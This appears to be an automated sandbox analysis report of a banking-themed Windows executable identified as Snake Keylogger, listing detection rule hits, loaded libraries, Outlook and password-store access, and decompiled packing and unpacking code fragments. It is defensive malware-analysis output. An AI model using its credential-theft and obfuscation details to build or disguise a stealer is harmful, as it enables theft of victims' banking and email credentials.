                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, 2Ac.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, 2Ac.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, xPlBfKlGB2IZMVKKlN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, xPlBfKlGB2IZMVKKlN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Halkbank_Ekstre_20230426_075819_154055.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMutant created: NULL
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3223175561.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeVirustotal: Detection: 55%
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeReversingLabs: Detection: 44%
                  Source: unknownProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: krUK.pdbSHA256COI source: Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Binary string: krUK.pdb source: Halkbank_Ekstre_20230426_075819_154055.exe

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  .NET source code contains potential unpacker
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, FHTwk1OmDHvQcjT4D9.cs.Net Code: I9aF6WgXIVr2f97mNYk System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, FHTwk1OmDHvQcjT4D9.cs.Net Code: I9aF6WgXIVr2f97mNYk System.Reflection.Assembly.Load(byte[])
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: 0xF32F70C2 [Wed Apr 15 21:42:26 2099 UTC]
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_01001A60 push esp; retf 3_2_01001A4F
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: section name: .text entropy: 7.95952575244103
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, FHTwk1OmDHvQcjT4D9.csHigh entropy of concatenated method names: 'q1RqieZmx3', 'NAqqmLohun', 'ocoqG1tuFW', 'RiKqQ0CKxd', 'IthqWoIpKn', 'NcFqsjeivw', 'cAeqt1yEHP', 'y9GqVRDjto', 'Nfkq6sbTfC', 'LIHqgj7aEX'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, ziedvnrBRhAIpT5Qi8.csHigh entropy of concatenated method names: 'Yu6nusVhf', 'pupvFh3A3', 'K3iLiTqTb', 'CqdhAd9Ve', 'wFc3Nmrpx', 'IqNrl0b8g', 'pLpCtFN4ruVv7NeP5k', 'cgI6uRmUl2ALWDGbqp', 'tWQkkLgAs', 'ucTZjVc2U'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, awHOa2tvZC3B51kOtt.csHigh entropy of concatenated method names: 'kPwkmvjKC7', 'j2kkGhLo6K', 'D9KkQcZLkA', 'qlBkWGnBRf', 'Gm6ksnhE7E', 'z09kt8Aa8i', 'hUFkVfnDX9', 'xgLk64xoMJ', 'aMykgRRiQo', 'BN2k9uTFDM'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, od4j2WLp01hKGvRovU.csHigh entropy of concatenated method names: 'ToString', 'tpj7KJWl7s', 'uRC7ftHy78', 'ydK7DnGIwS', 'Bp47Jv9MNk', 'P1T7MqsL70', 'kEr72nXW3m', 'pcm7aKwGke', 'jBu7eGBYQZ', 'jt77XEnsjb'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, cfK2jui8T0oYumsHiO.csHigh entropy of concatenated method names: 'S3JtYCdBaj', 'fHwtP3MXdu', 'DT8tnSSet7', 'u36tvts1U3', 'Y1WtToE70S', 'z34tL7FHGj', 'UWmthBTstI', 'Ow9t4mG3gA', 'iCNt3sHWYq', 'fnRtrhLfOi'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, JtOE33hfZH9hFUu4kMg.csHigh entropy of concatenated method names: 'HN38YKmY8V', 'zHt8PHc0II', 'u6P8nhRk9I', 'Paf8vvsToJ', 'sen8Tex6u1', 'mkW8Llc2Vk', 'z9M8hbfGSv', 'wno84c7Sfe', 'o4s83eoT2u', 'Y0X8rpEikK'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, bMHWQvIvpUEgKY4Zg9.csHigh entropy of concatenated method names: 'K9HlSbKuFP', 'bpjlw9N9Ta', 'd6dljoDKuE', 'yX8lEfZQXj', 'ucVlfyVauf', 'Ko3lDXkeyO', 'cmVlJfxesS', 'niilMPaJIe', 'L6fl2SrmGi', 'jmUlaNlBOK'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, t5mbvvPGfGMR4sTcBJ.csHigh entropy of concatenated method names: 'gsTNFLRRiD', 'oPmNBStXwf', 'SwbkH3ZjDg', 'gKBkAUAhsT', 'KyBNKOOvhT', 'QShNw4KOAl', 'Hj2NokQIAA', 'j5jNjdWtuY', 'VkLNElKVqi', 'UNcN5BnIXw'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, l1Qrv9zHACbYjdnnW9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EHQ80L4ZVB', 'fZc8lGI0L3', 'FR687La5NE', 'h5W8NmZr9Z', 'n6R8kpKkKM', 'fsx887iYCx', 'R198ZnnWr4'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, xPlBfKlGB2IZMVKKlN.csHigh entropy of concatenated method names: 'a0ZGjML0ZT', 'pKKGE6Z35U', 'Tp0G5tIssF', 'bemGp7phEW', 'TxxG1LldcX', 'hWQGdMNKrj', 'FtXGCLNq5M', 'fP8GFJd42S', 'iUrGbKshS1', 'IVWGBwJMUc'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, AX4t7qyE4jux1hf1Y6.csHigh entropy of concatenated method names: 'Oy9Qv4PvXm', 'P8dQL9LBKC', 'yabQ48llFn', 'acLQ3l9vgA', 'BY6QldWMk2', 'xVeQ7fS5O2', 'WDOQNt4Slf', 'KZ1QkhOxIK', 'gFPQ8gNyNI', 'WZqQZctj56'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, OMxwkrxpKFZmqViVRi.csHigh entropy of concatenated method names: 'YbUtmcbP2C', 'ue4tQHJwiq', 'bwvts0FNnp', 'T51sBAdueg', 'b3mszGAlTK', 'Wt5tHv2XNH', 'Y5OtAiHDin', 'j27tUOQI67', 'BZUtqsRI5G', 'rMFtRlBA5Z'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, HG4SfGhYBDdbP6jIh6a.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OCCZj2lJB1', 'uO0ZEgdHMO', 'mvQZ5x2XDs', 'T82ZpArCY3', 'p0xZ1OnGvb', 'NArZdKxQgA', 'kn3ZCCMU3D'
